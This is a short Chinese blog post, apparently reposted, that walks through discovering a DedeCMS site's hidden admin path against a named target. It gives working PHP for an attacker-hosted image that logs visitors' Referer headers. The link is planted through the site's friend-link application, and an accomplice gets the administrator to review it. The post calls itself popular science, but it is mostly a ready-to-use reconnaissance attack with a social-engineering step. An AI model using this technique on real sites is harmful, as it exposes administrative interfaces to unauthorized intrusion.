昔日

织梦后台找不到?新的方法给你!

ch1st --代码审计,web安全


此思路来自乌云漏洞报告平台


本文章只是实践一下,给大家科普。。

目标网站 :http://www.92security.com/

http://www.92security.com/dede/

默认后台不存在。


dede有个申请友情链接功能   是要经过后台审核的。
http://www.92security.com/plus/flink_add.php


现在转到其他网站。

随便在某个支持php脚本的网站里添加一个文件 

比如 http://HelenIsShability.sb/x.php

内容为

[PHP] 纯文本查看复制代码

<?php

file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);

header("Content-type:image/jpeg");

$img=imagecreatefromjpeg("a.jpg");

imagejpeg($img);

imagedestroy($img);

?>

大致意思是将referer地址保存在当前目录的x.txt

其他代码就是为了可以浏览图片 更真实一点。

保存后 把网址填到 flink_add.php 的logo处中

接着  我让某个核心成员 去找管理员。

没一会我就看到了生成的a.txt


referer被保存了下来  其中包括后台路径



评论

热度(1)

  1. 昔日ch1st- web安全,wifi攻防,代码审计 转载了此文字
    ch1st --代码审计,web安全